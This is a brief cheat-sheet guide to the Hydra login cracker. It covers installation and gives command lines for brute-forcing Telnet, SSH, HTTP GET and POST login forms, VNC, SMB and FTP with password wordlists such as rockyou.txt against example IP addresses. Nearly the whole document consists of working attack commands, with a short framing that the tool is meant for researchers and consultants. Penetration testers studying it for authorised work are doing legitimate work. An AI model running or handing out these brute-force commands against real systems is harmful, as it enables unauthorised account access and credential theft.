Guide - Hydra
H3xFiles
Twitter: @MindwarelabBot
www.mindwarelab.org
September 2019
The Lernaean Hydra or Hydra of Lerna (Lernaı̂a Hýdra), more often known sim-
ply as the Hydra, is a serpentine water monster in Greek and Roman mythology.
1
� Contents
1 Introduction 2
2 Installation 2
3 Protocols 2
3.1 Telnet . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2
3.2 SSH . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2
3.3 Get Requests . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2
3.4 Post request . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3
3.5 VNC . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3
3.6 SMB . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3
3.7 FTP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3
1 Introduction
Hydra is a parallelized login cracker which supports numerous protocols to at-
tack. It is very fast and flexible, and new modules are easy to add. This tool
makes it possible for researchers and security consultants to show how easy it
would be to gain unauthorized access to a system remotely.
Support
1 Cisco AAA , Cisco auth , Cisco enable , CVS , FTP , HTTP ( S ) - FORM - GET ,
HTTP ( S ) - FORM - POST , HTTP ( S ) -GET , HTTP ( S ) - HEAD , HTTP - Proxy , ICQ ,
IMAP , IRC , LDAP , MS - SQL , MySQL , NNTP , Oracle Listener , Oracle
SID , PC - Anywhere , PC - NFS , POP3 , PostgreSQL , RDP , Rexec , Rlogin ,
Rsh , SIP , SMB ( NT ) , SMTP , SMTP Enum , SNMP v1 + v2 + v3 , SOCKS5 , SSH
( v1 and v2 ) , SSHKEY , Subversion , Teamspeak ( TS2 ) , Telnet ,
VMware - Auth , VNC and XMPP .
2 Installation
1 sudo apt - get install hydra
3 Protocols
3.1 Telnet
1 hydra -l < username > -P < password_file > telnet :// targetname
3.2 SSH
1 hydra -l root -P / usr / share / wordlists / metasploit / un ix_pass words . txt
-t 6 ssh :/ / 1 9 2 . 1 6 8 . 1 . 1 2 3
3.3 Get Requests
2
�1 hydra -l username -p wordlist -t thread - vV -e ns -f IP http - get /
admin / index . php
3.4 Post request
1 -l indicates a single username ( use -L for a username list )
2 -P indicates use the following password list
3 http - post - form indicates the type of form
4 / dvwa / login - php is the login page URL
5 username is the form field where the username is entered
6 ^ USER ^ tells Hydra to use the username or list in the field
7 password is the form field where the password is entered ( it may be
passwd , pass , etc .)
8 ^ PASS ^ tells Hydra to use the password list supplied
9 Login indicates to Hydra the login failed message
10 Login failed is the login failure message that the form returned
11 -V is for verbose output showing every attempt
12 -s PORT if the service is on a different default port , define it
here
Example
1 Layout of command : hydra -L < USER > -P < Password > < IP Address > http -
post - form < Login Page >: < Request Body >: < Error Message >
1 hydra -l admin -P / usr / share / wordlists / rockyou . txt 192.168.2.1 http
- post - form "/: password =^ PASS ^: Invalid password !" -s 4004
3.5 VNC
1 hydra -P passwordlist -t 1 -w 5 -f -s 5901 1 92 . 16 8. 10 0 .1 55 vnc -v
3.6 SMB
1 hydra -L / root / Desktop / user . txt -P / root / Desktop / pass . txt
192.168.1.118 smb
3.7 FTP
1 hydra IP ftp -l username -P wordlist -e ns - vV
References
[1] Cheatsheet
https://github.com/frizb/Hydra-Cheatsheet
[2] Article one
https://www.hackingarticles.in/5-ways-to-hack-smb-login-password/
